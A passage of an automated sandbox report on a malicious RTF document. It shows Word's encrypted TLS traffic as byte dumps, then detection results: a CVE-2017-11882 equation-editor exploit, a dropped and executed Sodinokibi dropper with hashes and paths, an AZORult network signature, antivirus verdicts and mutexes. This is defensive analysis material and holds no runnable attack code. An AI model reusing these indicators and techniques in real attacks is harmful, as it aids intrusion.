546. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x045\\x7f\\x0e_f\\x01\\x0bh\\x97\\xd1a\\xc3\\xd1\\xf22 \\xe8-\ni>\\x9e\\x07\\xbc\\x97i=\\x17\\x92\\xc6\\x08\\x01\\x9d\\xa2q5z\\x19\\xc4\\xaa\\xd2\\x96\\x94\n\\x16\\xc5g\\xb7\\x8b\\x1f\\xd0\\xa4\\xd8\\xd8\\x14\\xb1\\xf0\\xfa\\xc4\\x1f\\x92\\x99\\x91\\x99\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x9b\\xe1!q\\xe6\\xe0c\\xf5c\\x0f\nvp\\xd2\\x9f:\\x88\\xf0\\xd2\\x87\\xb9c\\\\xde\".j\\xc4>\\xc2\\xc1zwj\\x19o'cs\\xb4\\xf4\\x9a\\xba\\xf1\\xdb\\x03\\xe6"
547.  
548.  
549. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd5\\xdc\\x92b\\xfd\n\\x17\\xae\\x14e\\x0f\\xc6\\x96\\x97\\xd4\\x18\\x8d\\xb2\\xe5s\\x94r\\xcb\\xa1k\\xc7\\x074\\xafr\\x11\\xbc m\\xcca\\x97e\\x89\\xc1\\xf4stu5\\xd9\\xd9\\xe3b\\xe4\\xa2\\xednq\\x80x\\x0f\\xa7\\x0es\\xb1\\x0bn\\xb7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe1\\xe6\\x1fk\\x88z\tb^u\\xb0\\xb5\\xc3;\\xfb\\xbb\\x07<\\xfb\\x1fq\\xee\\xe8>\\xba \\xdcp\\xb9\\xa9?\\xdbqx\\xe7\\x97\\xc6\\xdc3,\\x97\\x9b\\xee\\xb9g(\\xa7"
550.  
551.  
552. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xf6\\x9f\\x98\\x07^!\\x13\\xba\\xca\\x9emo\\xe4\\xf7\r\\x0e&\\xcc1\\x98\\xfd\\xfetj\\xf2\\x109\\x14\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
553.  
554.  
555. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb8\\x9c\\x1f<\\xb2\\xc6\\xe9m\\x88\\xb90\\xffy\\xca\\xf6\\xef\\x00h\\xc0$\\xa7\\x11y\\xb7\\xfd\\xc4c\\xb4\\xdd\\xe7m\\xa7\\xf4\\xa3\\x07\\x0e-u\\x8a;\\x8ba\\x98p\\x03!\\xe3\\xb7m\\xee\\x0f\\x8c\\x0c\\xcf\\xf9\\xbb\\xa8q\\xd5\\x07\\xb1\\x7fh\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfa`\\x92\\xd8(\\x9c\\xcd\\xfe\\xd6\\x90\\xa8\\xbb\\x98h\\xb8\\xebh\\xbe\\x06e\\x08\\x9c\\xc9\\x9c\\x95s|\\xc2\\xbdx\\x19\\xa5%g\\xc9\\x8a\\x99\\x9df \\xea\\x98k\\xddr\\xcbf\\x14"
556.  
557.  
558. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd2\\x986\\xecs\\x0f\"j\\xf5\\x1c\\xe8\\xb4\\xac\\x8f\\xe8\\xa3\\x02p2^\\x1a\\xda\\xa2\\xd2\\xd0\\xe9\\xca\\xb3\\x9epw\\x9d\\xf2\\x8d\\xa3\\xe0~`o\\xa2x\\x07\\x1b\\xa5v\\x91@\\xae=\\x93\\x1cwkd\\x1c\\xb9g\\x94\\xab\\xe4qk\\xca\\xb2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xecl_s:^\\xc4\\x1c:\\xb9\\xf8\\x1by\\xb0\\x0ey\\xb9'\\xb1\\x13\\x9c\\x8f\\x99\\xd9c\\x95ih\\xa7\\xf1dw\\xb4\\x10#\\x8b\\xe4&\\\\xd5\\x95*>iv\\xd6f\\xbe"
559.  
560.  
561. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94k\\x1d*\\x82\\xc4\\xa5in\\x16<o\\x80\\x8fb._4u\\xf3'\\xfc\\xd6\\xfc>w\\xfa\\xd7`\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
562.  
563.  
564. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04kv\\x83\\xfa\\x02m.j\\x16\\x88z\\x0f\\x81\\xda\\xd2$\\x02\\xf2~\\xc5\\xa4\tp\\xdc\\x18\\xb3h\\xb7\\xa3p\\x12\\xbf\\xc79\\xb1\\xb4b\\x1f\\xb6\\x93\\x99i\\xf2\\xf6/\\xb6\\x14\\xd5f\\xb6rg\\xbd\\xde!q\\xfc\\xeb\\x8d\\x84\\x03\\xc8\\xb5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc2\\x06\\xb1\\x0e\\x1e\\xe7.\\xf6\\x1f\\xda\\xce\\xfe\\xb3\\xc7\\x9e\\xe1\\xe1l\\xed+\\xc0\\xe1\\xeb\\xce\\x16\\xf6c\\x0f\\xa4\\xecfc\\x0e\\xfc\\xf0\\xde.\\x00/\\xd0\\x1d\\x93\\xc3\\xba\\x16\\xdf"
565.  
566.  
567. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe6q`\\xd8\\xe4\\xf2;\\x08\\x80\\x83w\\xe4i\\xb1:\\xde$\\x1e\\xfb\\x1e\\x88\\x02\\xd8\\xf1\\xa56\\x8d\\x1e\\xde;\\xcc\\x0f\\xaaf\\x07am\\x99\\xcfwhy\\x06\\x18\\xf2le\\xa6 \\x1e\\x87\\x99\\x00@\\xa0\\x19^\\x04z\\xf7\\xd4md\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xdb\\xc9\\x1e\\xde\\xfby&9k\\xcb\\x919i\\x8e/\\xa5\\xf6\\x1c\\x18\\xc8c\\xbc>\\xe2\\xbfp\\xe5\\xb4\rs7\\xf2nl\\xa9x3l\\xdb<\\xfa\\xa2\\x9f\\xfbh\\xe1\\xda\\xec"
568.  
569.  
570. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x90_\\xb0\\xeb\\\\xb3\\xefmg\\x8b\\x00%@\\xc6\\xab\\xec\\xe8\\x0fd\\xc0b\\x93\\xb3k\\x80\\xde\\xa7 1\\xb5o\\xca+\\xfb\\x0f\\xe6\\x18\\xce:\\xb8j#\\xd4\\xc2n\\x03\\x17\\x88\\xc8\\xfby\\x12\\xab\\x0b\\xcd\\xf1\\xe3\\x08\\x8f\\xb8>\\xe0\\xf5\\x87\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0006\\xd8\\x9c\\xad\\xcdf\\xf8h\\x0f\\x91\\x9a\\x9d~\\x95\\xfd!\\x0f\\xa6\\x86u\\xa1\\x9f\\x8c\\x19\\x9b\\xcd\\xb1\\x9c\\x03\\xd8\\x8d\\xfdm\\xd1\\xcc\\x994\\xdd\\x10\\x03\\xf1\\xfd\\xd4\\x06-\\x85v\\xfc"
571.  
572.  
573. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xaa\\xcb\\x1e\\x914\\xfa\\xa12ul3\\x0e\\x97\\x82ou\\xf3\\xf6q\\x05\\xf1(\\xb4+7'\\x03p\\xcfd\\xb0\\xbb\\xbd=\\xd5k\\x06\\xd1\\x85\\x08g\\x8c\\xfb\\xe0ts\\xe6\\xe8\\xbf\\xcc\\xaagrz\\d\\xf4az\\xf8\\x87\\x03\\xa7\\x19\\x10\\xed\\x03\\xd0\\xce/\\x9e\\xd1ki\\xa7\\xcf\\xf4;\\xd3!d\\xcb\\xf6\\x89f\\x02\\xe3\\xac\\xd7%%z\\x91w\\x1d\\x1cqn\\x14\\x0c\\x81\\xb0w\\xb3\\xcf\\xf1w\\xb7\\x03\\x99\t\\xc6\\xc5m\\xc0b7/v\\xe7\\xa2\\x88\\x95\\xc5\\x9f\\xbe~\\xec\\x8b\\xbc@'m\\xead|\\xfe\\x8a|\\xfe$k\\xb58\\xd4\\xcah\\x16\\xc2\\xe2\\x80\\xfe\\x08\\xa1\\xc5\\xad\\xe20\\x88k\\xc1\\xcb.\\xa5\\x89\\x9b\\xa0\\xe6v\\xe4\\x14\\x10\\x14\\xf57\\x1a+ej\\xd0\\xa5j\r)\\xe0\\xe2\\xf0t\\x1e\\xca\\xd3\\x8f\\x0f\\xcbr\\x0f+\\x81\\xf0u\\x1c\\xce\\x1a\\x9f\\xab\\xd9\\x80\\xcf\\x98\\xecrl\\xae\\xc5\\xfbz\\xbd\\x16\\x02\\x16u\\x8e\\xe5\\x83s\\x8e\\xb4\\xea4c\\x96\\x84\\xdf\\xcf\\5ob\\x87x\tx+\\x98\\xbe\\xf9x\\xdb"
574.  
575.  
576. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9c\\xdb\\xe6\\xfc or\\x81o\\xfd\\xe4\\xfcj\\xc7\\xf1\\xcb\\xf3\\x92\\xf8\\xb0\\x0fv6x)\\iy\\x8d\\x9f\\x1e\\xf3\\x1b\\x80\\xf0\\xce|\\xf8\\x1f\\xc5f\\x91\\xf7\\xbc\\x15\\x99\\xdf\\x89\\x8adms\\xea@\\x89j\\xd7?>i\\xf3\\x9d\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa0&\\xd2\\xc4y\\xcc\\xe7\\x97w;x\\xfd\\xc9xj\\x88\\xee\\xcb\\xcf|o\\x8c\\xee\\xd7\\xb4\\x0b\\xd4\\xae\\xa1\\xbd\\xd5\\xba'\\xbc\\xf6\\x1aq\\x84\\x11rjo6\\xf1\\x89\\xf5\\x9e\\x90"
577.  
578.  
579. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04>.\\xa7&w\\xb5\\xdb\\xdc\\x91\\x17v\\xc2\\xe9\\xffy\\xc7e\\xd4\\xee\\xfa,\\xe1\t\\xb4c\\x8e\\xf4\\x9e\\xd9\\xe8;\\xa1;v\\xab\\x11\\xa2;\\xe5.\\x01\\xec\\x13g\\x1a\\x97m\\x94\\x1c\\x1b\\xa9\\xe9\\xc1\\xe2\\xe8v\\x0cy\\xaa w3\\xd7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe3\\xcf\\x84\\xffa\\xf2\\xb02\\xec\\xecly\\x99:4d\\x19\\xaa\\x87v\\xc5%\\x0f\\x96z\\xa5cm\\xcb\\x84\\x07\\xd2\\xe9\\x192|\\x8a~\\xa3\t\\x9f\\xf6y\\xb8\\x10e\nc"
580.  
581.  
582. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04k\\xb8\\xb9\\xfe\\x07e\"sbz\\x1b\\x101u\\x9c&\\xf9g)\\xc8\\xf3m\\xadt\\xb7\\xb3\\xbcj\\x08\\x98\\xc6$pm\\xdf\\xdc\\xcd\\x9es\\xc5\\x9atqj*\\xe6\\xce\\xc1\\x044@5xe4\\xde\\xd9\\xa2\\x07\\x9d\\xba\\xedi\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd1t*\\xafu@\\x03\\x1a\\x8a(r\\xcf_w\\x9b\t\\xf2v\\x02\\x92\\xba\\xf9\\xeep?\\xad\\x82x,\\xebhk\\xf9\\xad`((\\xba\\x9d:%\\x1c6\\xb4\\x88\\xcd"
583.  
584.  
585. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x7f\\x86v\\xbc\\xb4\\xf2\\xb7\\x0fh\\xa8_ |rn\\xfb\\x1c'#=\\x9d2\\xd8\\x1f\\x9a\\xdd\\x0c\\x80\\xd1\\x19?\\x04\\\\x9c\\xe8lb\\xf8\\xce\\xbey\\x8c\\xf5\\x0e\\xb9z^\\xc9\\x13s\\xea\\xdc=\\x9b\\x81s\\x10\\xd9\to\\x15\\xb7\\x8e\rmxw*\\xfb\\xa9v\\x16#\\xe4\\x97u\\x8e\\xd1c\\xd4f\\x8fd\\xb5\\x9dd\\xac\\xa3h\\xa1\\xf4(\\x0f\\x12n\\x81\\xf1\\xe71s\\xc9\\xe9\\xe9\\xaa\\x8eq\\xc4+\\xc6\\x7f\\x0e3\\xa0\\xca_\\xd02\\x1b\\xbf?\\xff\\x91~\\x1c\\xcf\\xc1\\xef\\x95\\xc2\\xb3\n\\xca\\x0e\\xfd$\\xfc\\x90\\x15ou\\x8a\\xec|\\xdc6:0\\x1a\\xa0\\xb1\\x83\\xf7#|5c\\xe0-\\xb7\\x8c\\x9ai\\xeda\\xd7\\xe6l\\xef\\x87\\x96d\\x03\\x14\\xf4\\x88\\xe0\\x1bht\\xc2/\\xaf\\xcd90m\\xcb\\xaa\\xed\\x93u\\xb92\\x89u\\x81\\xd7\\xa3\\xa1\\xc6nj2%@\\xcc\\xd5\\x8f\\xf8\\xaa\\xb8\\x01\\xe4\\xc29\\xbdn\\x93\\xa7\\xdfs\\xb38\\xa4!7q\\x04\\xe6\\x80\\xd8\\x19$\\xea\\x84\\xc8\\xffp\\x9e\\xaf\\x96\\xa8\\xads\\xad\\xd4\\x89\\xb0l"
586.  
587.  
588. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010$!\\xadaw\\x93\\xb5\\xde\\xcds\\x9d\\x18\\xeao\\xc7\\x8f\\xb2\\xfbi\\x8f\\x0b\\xbc\\x83\\:\\xd2\\x02<&;\\xba\\x9bg\\xd4\\xda\\x91\\xe0\\x1b\\xcf\\x8a3\\x06q\\x94\\x9dz\\xb8\\x9d\\x05=:\\x19\\x89\\xed\\xdb\\x85oa\\x96k\\xac\\xb1\\x18\\x97\\x02@\\xc2ystt\\xbeu\\xfd\\x12\\xc5\\x96\\xe9\\xf4\n\\xc1\\x90&\\x1b\\xb3\\\\xd0\\xd9\\x03\\x8c\\xfb\\xfc\\xcd\\x81\\xb5i\"\\x0bwd7\\x9c\\xe2\\xe2\\x13\\xfc\\xa5@=_\\xbb\\x9b\\xa1\\x93\\xc5\\x17\\x94\\xd4i\\xd9k\\xfc\\xb4\\xbed;\\x179\\x972\\xa5\\xfbs0\\xcfy\\x94\\x1a\\xbc\\xd4\\xbd\\x11\\xf2'\\xa2\\xff\\x98\\x1f\\x9f\"f\\xf0w\\xd2\\x97\\xbf\\xe6j\\xcd\\x8c\\xca\\x82\\xeav/\\xf3?w\\xef\\x0c\\x84l\\x0fp\\x12v;\\xba\\xdfb\\xce\\x05\\xb7\\x94\\xa2x\\xfbd\\xcbw1\\xa3\\xf39zh\\xd0s\\xf6\\x0c\\xfe\\xe6\\x12\\xde\\x00\\xa8\\x03\\x86=j\\xae\\xb7\\xd5vjj\\x94\\x92\\xe9e/\\x9ee\\x1c\\xee\\x1e\\xd9k\\xe5 \\x7f\\xa5*\\x81\\x82\\xc9\\xa6\\xe8\\x8f\\xc4\\xaa^p\\x91h\\xbbie\\xc1"
589.  
590.  
591. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc1e\\x1a@\\xfdm\\x1cv\\xf8z\\xd9+\\xed~%\\x84\\x15\\x83\\xeb\\xcb!l\\x05\\xfa\\x0c\\xec_o\\xdd\\xf3:\\xa6\\xd8\\xcd4+:z\\xd6\\x98\\x8c\\xb5\\xe2za\\xdd\\\\xb9,\\xb43\\xa8\\xb3\\x9ek\\xba\\xd7\\xb9*v\\xa7`\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000l\\xbf\\xd6\\x89\\xe7\\xa3j\\xb8\\x8f\\x83\\x95\\xf0\\x03\\x1bv\\xd0\\x11y\\x05\\x12\\x9f#\\xaf\\x92\\x1c\\xa6\\xfa\\xe6\\x9a\\xfc\\xdf\\x00~\\xfeymy\\x85~\\x15\\xcc\\xb8\\x92\\x8c\\xff@"
592.  
593.  
594. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe8\\x1e\\xa1\\xe2\\x82\\xc2$\\x82\\xfb\\x19\\xfez\\xe8id\\xb3\\x9d\\xd5d\\xa3#@\\xaf\\xde\\xed\\x14\\xccddk\\x86z\\x8b\\xcdxh\\x86\\x8c%\\x8b\\x003\\x89\\xfdg\\xeb\\x84ai\\xb6\\xeb\\x02\\x88\\xdf\\x0bj\\xcb0a\\xc4\\x8b\\xba-\\xf00\\x042\\x98n\\x03lth\\xfb\\x95\\xc5a$\\x82\\x97w\\xff\\x16\\xf4#\\xd3\\xffo\\x15\\xd0\\x18\\xdey\\x9c\\x19\\xcan\\xf8\\xf7\\xf33\\xe9\\xb9wu\\xa9\\xb3\\xe15\\xb6b\\x83\\xec\\xfai\\\\xfe\\x90\n<=\\x88b\\x0e\\x06\\xf2\\xa2\\xaa\\x07\\x148\\x9b\\xd0\\xda-\\x08\\x0e\\x98\\x17zvm\\xa6\\xccd1\\xe1\\xf4\\x06\\xda\\x1a\\x05\\xd9\\x1b\\xa8\\x8aq\\x8c\\xb3\\x13\\xbe/\\xbf6\\\\xb09\\xc8\\x9f\\xf0:e\\xbc\\x96\\xb6\\x98f\\x8a\\xa2\\x86\\xb3\\x95\\xca\\xbf\\xcc\\xd9i\\x9d\\xd7\\x15\\x03\\x04\\x14\\xe6\\x1c\\xf9\\x9e\\xb3l\\xce#;\\x1d\\x8dl\\xe1\\xd7&j\\x18\\x8dw\\xc1\\x90\\x0b\\x93:j\\xc5\\x12\\x03\\x15x\\xa3;\\x9cc@,\\xa7\\x06\\x12+\\xff\\xd0\\xd9\\x81z\\xca\\x00\\\\xc1\\x10\\x96\""
595.  
596.  
597. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb1u\\xa0i\\xa6r\\x7f\\xe0d\\xe8\\x7f&\\xf1\\xbd(\\xc4\\x05\\xca\\x98\\xe4vs5j\\xc3\\xf0\\xa4\\x87y4\\xc6^\\xb5\\x80\\x96e\\xbb\\x08\\xc7\\xdd\\x1de\\xca'o`\\x81ea\\xb9'z\\x8f\\x822\\x07\\xa6\\x801\\xf9\\x86\\xcb&\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000n-\\xeeh\\xe5\\x9a\\xf2y\\xe3\\x95\\xba\\xbfxyev\\x18\\xff\\xf2\\xd2\\xd2\\xf7\\x97\\xfa\\xd6\\x82~u\\xda\\xe7\\xd6j\\xc2\\xa4k\\x15\\xc6!\\xae\\x95k\\xc0$\\xc9\\x00k\\x06\\xe3"
598.  
599.  
600. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe0\\xf0\\x0f\\x94\\xa4\\xb6\\xe4\\xc0\\xbd\\x03/$\\xe9\\x90v: s\\xcfb\\xfcn\\xc1\\x8c\\xed\\xfcm\\xe2h\\xac\\x03uv\\x1c\\xf5\\xf1c\\xf8\\x1c~n\\x04\\xedn\\xa8\\xaa \\xf2hc?\\xa4\\x89\\x14;a\\x01\\xaa-\\xc5\\xa7o\\xda\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd7\\xb1\\x08%<ci\\xd1\\xbc\\xb8\\xb6umu\\xfb\\x10\t\\xf4\\xf5\\xdb\\xe0\\xd4\\x94\\x12\\xe3\\xc1\\xe5\\xdf\\x8b\\x04j\\x84_\\xbf\\xb4\\xb4\\x19\\xe4\\xcb\\x0f\\x92\\xf7\\x83ms\\xf2\\xf9"
601.  
602.  
603. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xf6\\xcc\\xebb\\x1d/\\xc4\\xb7\t\\x18\\x1d\\xd7\\x17\\xa2$\\xd1*\\xec\\x154\\xda\\xe1^\\xab\\x8d\\x08\\xa3\\x8b\\x85\\xcdj\\xea\\x91\\xf3t9\\x1c7\\xba\\xe5,\\x1bnp\\xc5\\xb0n\\xda\nt\\xf0\\x13\\x97nm/\\xec\\xb7\\xa5\\xda\\xcc\\x96\\x98\\xdf\\xc9\\xf2 \\x876l\\x04r5\\x0f\\xf7ff\\xd2!z\\x0f\\xf4\\xad\\x1ai\\xadg\\xb88\\x16\\x14\\xa0\\xc8kt\\x02\\xcavzs\\xc7\\xeez\\xc2\\xb6\\xf8m\\xed\t\\xe9\\x8c\\x82\\x14x\\xe4\\xa5\\xa5\\x80\"\\xdf\\xb6\\xeat\\xb0\\x0f\\xeb\\x93\\x1d(\\x16\\xf9t\\x1f4\\xfcmk#\\xed\\xf7\\xe4\\xb62u|\\xda\\xc2\\xbf\\x88\\xd9\\x11\\x05\\x01n\\xc6\\xb6\\x9b\\xe6\\x14\\xffntm0j\\xfb\\x83h\\xed\\xf2\\x8a/\\xfc\\xda\\xcb\\x8d\\x82\\xc4\\xec\\xca:\\x1f\\x02\\x80|b\\xbc3\\x9e\\x15\\xda\\xc3m\\xa1\\xceb\\x0b\\x9b\\x8a\\x0f#p\\xdaf\\xa5\\xc6\\x87\\xe5i\\x01\\xa0\\x9a\\xc7\\xc9\\xb2m4\\x80\\xea*oa\\xe5\\x8f\\xc0\\x1c\\x9d\\x94q\\x7f\\xae\\xf0\\xce\\x9bc\\x1cslybt\\xbe\\xdd\\xd6\\xd9\\xcb\\x89\\x9b\\xfb6"
604.  
605.  
606. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x01w,gd\\xdc`\\xb4\\x01\\xab\\xd1\\xa9h\tm\\v\\xce<%\\x8b\\x95e\\xe5<\\x0f\\x82\\x17i\\x9e~\\xcd\\xd78\\x8c\\xf7-e4\\x7fqx/\\xd2\\xf5\\xef\\xa0y;\\xef\\x81\\xb4\\xc4\\xce@\\xcb\\x1b\\xe5\\xd9w9\\xa8\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000z\\x0b\\x8b2<\\x98\\x91\\xa1\\xf7yx\\x99\\x1b\\x1a\\x115\\xf6b:\\xd9lf_k\\xb6\\x1f\\xca7=&o\\x93j\\xf9\\xb4\\x99\\x83\\x7f\\xcb\\xc6:xq'\"\\xa8"
607.  
608.  
609. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe7\\xc0\\xfdgf\\xc5\\xfa\\xd0\\x0c\\xc8zp\\xc2q\\x8d\\xd5\\x93\\xad\\xe6sw\\xaf\\x07\\xe6a\\x11k%\\xad\\x0b\\xe9\\xdb\\xae\\xdc\\xda\\xc3:a\\xfc\\x1b\\x7f\\x8a\\xf8'\\xd3\\xc7\\xd2\\xdf\\x9b\\xe8$\"\\xef\\xede\\xaa\\xbd\\xd9g7mf\\xbb$\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf5\\x81\\xeb\\x9f\\x16\\xa4\\xf1v\\xa4\\xb05+\\xc6\t\\xb8\\xc6\\xed$\\x06\\x12<\\xd7\\x96\\xd3\\xe8\\xe6\\xd0\\x8bb\\xd0~\\xa8\\xcc\\xfe\\xc6\\xb0\\xc7\\x1a\\x05\\xeb\\xf3\\x9f\\xf4\"\\x00"
610.  
611.  
612.  
613.  
614. "Description": "The EQNEDT32 equation process created a child process likely indicative of CVE-2017-11882 Office exploit",
615. "Details":
616.  
617. "created_process": ""
618.  
619.  
620.  
621.  
622. "Description": "Stack pivoting was detected when using a critical API",
623. "Details":
624.  
625. "process": "WmiPrvSE.exe:2848"
626.  
627.  
628.  
629.  
630. "Description": "Creates a hidden or system file",
631. "Details":
632.  
633. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\~$BQQr0dX.doc"
634.  
635.  
636. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp"
637.  
638.  
639.  
640.  
641. "Description": "File has been identified by 34 Antiviruses on VirusTotal as malicious",
642. "Details":
643.  
644. "MicroWorld-eScan": "Exploit.CVE-2017-11882.Gen"
645.  
646.  
647. "FireEye": "Exploit.CVE-2017-11882.Gen"
648.  
649.  
650. "McAfee": "Exploit-CVE2017-11882.yx"
651.  
652.  
653. "Arcabit": "Exploit.CVE-2017-11882.Gen"
654.  
655.  
656. "Symantec": "Exp.CVE-2017-11882!g2"
657.  
658.  
659. "ESET-NOD32": "probably a variant of Win32/Exploit.CVE-2017-11882.A"
660.  
661.  
662. "Avast": "Win32:ShellCode Expl"
663.  
664.  
665. "ClamAV": "Doc.Exploit.CVE_2017_11882-6934206-0"
666.  
667.  
668. "Kaspersky": "HEUR:Exploit.MSOffice.Generic"
669.  
670.  
671. "BitDefender": "Exploit.CVE-2017-11882.Gen"
672.  
673.  
674. "AegisLab": "Hacktool.MSOffice.Generic.3!c"
675.  
676.  
677. "Tencent": "Office.Exploit.Generic.Pdvz"
678.  
679.  
680. "Ad-Aware": "Exploit.CVE-2017-11882.Gen"
681.  
682.  
683. "Emsisoft": "Exploit.CVE-2017-11882.Gen (B)"
684.  
685.  
686. "F-Secure": "Exploit:W97M/CVE-2017-0199.B"
687.  
688.  
689. "DrWeb": "Exploit.ShellCode.69"
690.  
691.  
692. "McAfee-GW-Edition": "Exploit-CVE2017-11882.yx"
693.  
694.  
695. "Sophos": "Troj/RtfExp-EQ"
696.  
697.  
698. "Cyren": "CVE-2017-11882.C.gen!Camelot"
699.  
700.  
701. "Avira": "EXP/CVE-2017-11882.Gen"
702.  
703.  
704. "MAX": "malware (ai score=94)"
705.  
706.  
707. "Antiy-AVL": "TrojanExploit/OLE.CVE-2017-11882"
708.  
709.  
710. "Microsoft": "Exploit:O97M/CVE-2017-11882.L"
711.  
712.  
713. "AhnLab-V3": "OLE/Cve-2017-11882.Gen"
714.  
715.  
716. "ZoneAlarm": "HEUR:Exploit.MSOffice.Generic"
717.  
718.  
719. "GData": "Exploit.CVE-2017-11882.Gen (2x)"
720.  
721.  
722. "ALYac": "Exploit.CVE-2017-11882.Gen"
723.  
724.  
725. "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
726.  
727.  
728. "Zoner": "Probably W97NativeOnly"
729.  
730.  
731. "Rising": "Exploit.CVE-2017-11882!1.B40D (CLASSIC)"
732.  
733.  
734. "Ikarus": "Exploit.CVE-2017-11882"
735.  
736.  
737. "Fortinet": "MSOffice/CVE_2017_11882.A!exploit"
738.  
739.  
740. "AVG": "Win32:ShellCode Expl"
741.  
742.  
743. "Qihoo-360": "virus.exp.21711882.d"
744.  
745.  
746.  
747.  
748. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
749. "Details":
750.  
751. "target": "clamav:Doc.Exploit.CVE_2017_11882-6934206-0, sha256:7e6d04a02911f357032f250c91ee5efd90634728d8c1bab5b1e170e30350ad84, type:Rich Text Format data, version 1, unknown character set"
752.  
753.  
754. "dropped": "clamav:Win.Dropper.Sodinokibi-7052937-0, sha256:3195943681220ae13190e79c117b45bdef28ad33e37246a6f5f05ddc7c21b47d , guest_paths:C:\\Users\\user\\AppData\\Roaming\\oko.exe*C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\oko1.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
755.  
756.  
757.  
758.  
759. "Description": "Drops a binary and executes it",
760. "Details":
761.  
762. "binary": "C:\\Users\\user\\AppData\\Roaming\\oko.exe"
763.  
764.  
765.  
766.  
767. "Description": "The RTF file contains an object with potential exploit code",
768. "Details":
769.  
770. "cve": "Object 2 index 00000032h contains Microsoft Equation 3.0 (Known Related to CVE-2017-11882 or CVE-2018-0802)"
771.  
772.  
773.  
774.  
775. "Description": "Collects information to fingerprint the system",
776. "Details":
777.  
778.  
779. "Description": "Created network traffic indicative of malicious activity",
780. "Details":
781.  
782. "signature": "SURICATA TLS invalid record type"
783.  
784.  
785. "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
786.  
787.  
788. "signature": "SURICATA TLS invalid record/traffic"
789.  
790.  
791.  
792.  
793.  
794. * Started Service:
795. "osppsvc"
796.  
797.  
798. * Mutexes:
799. "Local\\2BF388D5-6F8C-40A0-A7EE-996D005C4E14_Office15",
800. "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
801. "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
802. "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
803. "CicLoadWinStaWinSta0",
